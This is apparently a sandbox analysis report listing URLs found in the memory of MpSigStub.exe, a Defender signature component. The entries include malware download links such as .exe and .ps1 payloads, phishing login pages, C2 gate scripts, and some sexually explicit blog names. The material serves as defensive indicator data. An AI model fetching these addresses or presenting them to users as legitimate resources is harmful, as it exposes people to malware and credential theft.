    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bollyinthon.com/docusign/doc/home/index.php)
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://bonkersmen.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://bonzo.lublin.pl/help/helpNEW.exe
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://book4u-free.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://booknology.com/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://boomdakai.tk/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://bootreading.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmpString found in binary or memory: http://bopdu.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://bornforthis.ml/liverpool-fc-news/features/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bornonthescene.com/purchase/kill.php?ten=fingers)
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://boscumix.com/optima/index.php
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://bosengaptek.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://boss.orda.icu/mailb.php
    Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmpString found in binary or memory: http://bot.cjfeeds.com
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://bousalemfoot.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://brazzerslove.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://brembotembo.com/1.dat
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://brembotembo.com/2.dat
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://brembotembo.com/doc.xls
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://brilhosefascinios.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmpString found in binary or memory: http://brokentools.xyz/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://brotherunited.cf/.start/yxblcmv6qgnhcm5pdmfslmnvbq==
    Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmpString found in binary or memory: http://browsetosave.info
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://bsskillthdyemmulatorsdevelovercomun6bfs.duckdns.org/document/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://bugs.clamav.net
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://buildwith307.com?
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://bukankeranaakutakcintafull.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://busco-mujeres.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://businesswebapp.com/realtors/wp-admin/js/jb/login%20pdf.html)
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://butterchoco.net/admin/bull/gate.php
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://buy.haote.com/?
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://buydomainnameuk.com/img/pole.exe
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://bytecoin.tk/m/svchosts.exe
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://c2quocoaidateh.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://c4.faceb00k.com:8888/files/run2.ps1
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://caferestaurantnador.com/wp-includes/0onjp/
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://calastargate.net/y82rtzbz.php?id=1484429
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://calendar.cjishu.com/index.php
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://californianlondon.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpString found in binary or memory: http://calleveinte.com.mx/ups-quantum-view
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://calux123.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmpString found in binary or memory: http://camaraquiterianopolis.ce.gov.br/rechnung/
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://canadahalalec.com/b685cf9fdc885f90abbb39b13022d1c4.php?q=
    Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmpString found in binary or memory: http://canonicalizer.ucsuri.tcs/(%w%w
    Source: MpSigStub.exe, 00000023.00000003.6289828443.0000028BD74D2000.00000004.00000001.sdmpString found in binary or memory: http://canonicalizer.ucsuri.tcs/3
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://capers07.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://capsnit.com
    Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmpString found in binary or memory: http://captinads.com/oldtest/page.php
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://care-indonesia.org/open-invoices/
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://cargohl.com/ds/161120.gif
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://carrentalhelp.org/cd/cd.php?id=%s&ver=ig1
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://carrythelamp.net?
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://carsgirlssexy.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://casaalberti.com/wp-content/files_mf/2/resume.php?id=
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpString found in binary or memory: http://casinotropez.com/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://cassia89.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://cassia89.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://catatanerwin.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://catatanfarhans.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://catell.ru/set.js
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://cbadenoche.com
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://cbl.toolbar4free.com/cgi-bin/s.exe
    Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmpString found in binary or memory: http://cc.advancedpccare.com/wcfCountryPricing/countrypricing.svc/GetCountryCode
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://ccc.avn12.cn/ccc/qqqccc/post.asp?i=77
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://ccdelsur.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmpString found in binary or memory: http://ccfairy.com/
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://cdn.ap.bittorrent.com/control/tags/
    Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmpString found in binary or memory: http://cdn.chatcdn.net
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://cdn.che.moe/ymufnn.exe
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=126
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=130
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://cdn.montiera.com/mntr/cmn/addonmsg.htmx
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://cdn.starter.fm/s/tuto4pc/ads/fr/startertv/player_tv.html?
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://cdn.zry97.com/youxi
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://cdn.zry97.com/youxi/index_x
    Source: MpSigStub.exe, 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmpString found in binary or memory: http://cdsa.xyz
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://ceaircelle76.org/2.php?configklvar=1
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://cekirdekinanc.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: http://celebrity-nude-fuck.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://celebritybeefcake.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://celebs21mangap.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://centralcarqocn.com/fax/fe.doc
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://cert.beahh.com/cert.php
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://chambahistory.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://chemgioaz.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://chilai.com/system/libraries/tep.txt
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://chistepordia.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://chiuwes.com//kemu.exe
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://chnfsub2manglobalsndy2businessexytwo.duckdns.org/office/
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://download.websearch.com/dnl/T
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://download.zhongsou.com/cdsearch/
    Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmpString found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
    Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmpString found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://download1.ihyip.pw/
    Source: MpSigStub.exe, 00000023.00000003.6346352877.0000028BD65BA000.00000004.00000001.sdmpString found in binary or memory: http://download1.microliteupdate.net/
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://downloader.aldtop.com
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://downloadfile.xyz/mine/run.js
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://downloadfilesldr.com/allfile.jpg
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://downloads-full.com.br/
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://downloads.180solutions.com/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://downtown.crstycricri.net/pc/page/set_reg.php?af_code=&cuid=
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpString found in binary or memory: http://downza.cn
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://dqbdesign.com/wp-admin/cu_sa/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://dr-woelfl.de/invoice-for-you/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://driversearch.space
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
    Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmpString found in binary or memory: http://dtrack.secdls.com
    Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmpString found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://duhjhv.ftp1.biz/ip/stat.php
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://dvd2ipad.net/media2
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://dw.mtsou.com/
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://dw.mtsou.com/_
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://dwaplord2018.tk/doc/purchaseorder.doc
    Source: MpSigStub.exe, 00000023.00000003.6268133446.0000028BD6E8E000.00000004.00000001.sdmpString found in binary or memory: http://dx.mastacash.com
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://dxcodec.com/uninstall/
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://dz-site.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://e223pg.awardspace.co.uk/up.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://eda.ru/data
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://egomam.ru/neworder.doc
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://ekey.sdo.com
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://elpctchair00.net/pc/page/set_reg.php?code=&cuid=
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpString found in binary or memory: http://elsword.com/xb
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://employeeportal.net-login.com/
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://en.aa.com
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://en.eazel.com/
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://en.v9.com/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: http://endresactuarial.com/
    Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmpString found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://enomioms.club/msw/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://erlivia.ltd
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://ermi.co.zw/ds/2312.gif
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://errors.crossrider.com/utility.gif
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: http://errors.statsmyapp.com
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: http://errors.statsmyapp.comxa
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://escritorioharpia.com/wp-content/upgrade/resume.php?id=
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://esiglass.it/glassclass/glass.php
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://esp1k.myddns.me/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://estelaraziel.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://etzhb.000webhostapp.com/read.txt
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://eula.mindspark.com
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpString found in binary or memory: http://eula.mindspark.com/eula/
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: http://evanstechnology.com
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://events.bittorrent.com/startConversion
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://everbot.pl/cs/reg.php?id=
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://ewd96h2.sed.macabrepoe.com
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://excelvba.ru/updates/download.php?addin=Parser
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://exe-1.icu/install2.exe
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://expandingdelegation.top/
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://experimental.sitesled.com/wind.jpg
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://explorehere.in/info/new-invoice-
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://f0568929.xsph.ru/po/rexifly.php?
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://faacebookv.tk/reveal.php
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://facebegen.com/dexport/ajax.php
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: http://faithhotelghana.com
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://faneuil-lawsuit.com/xl.png
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
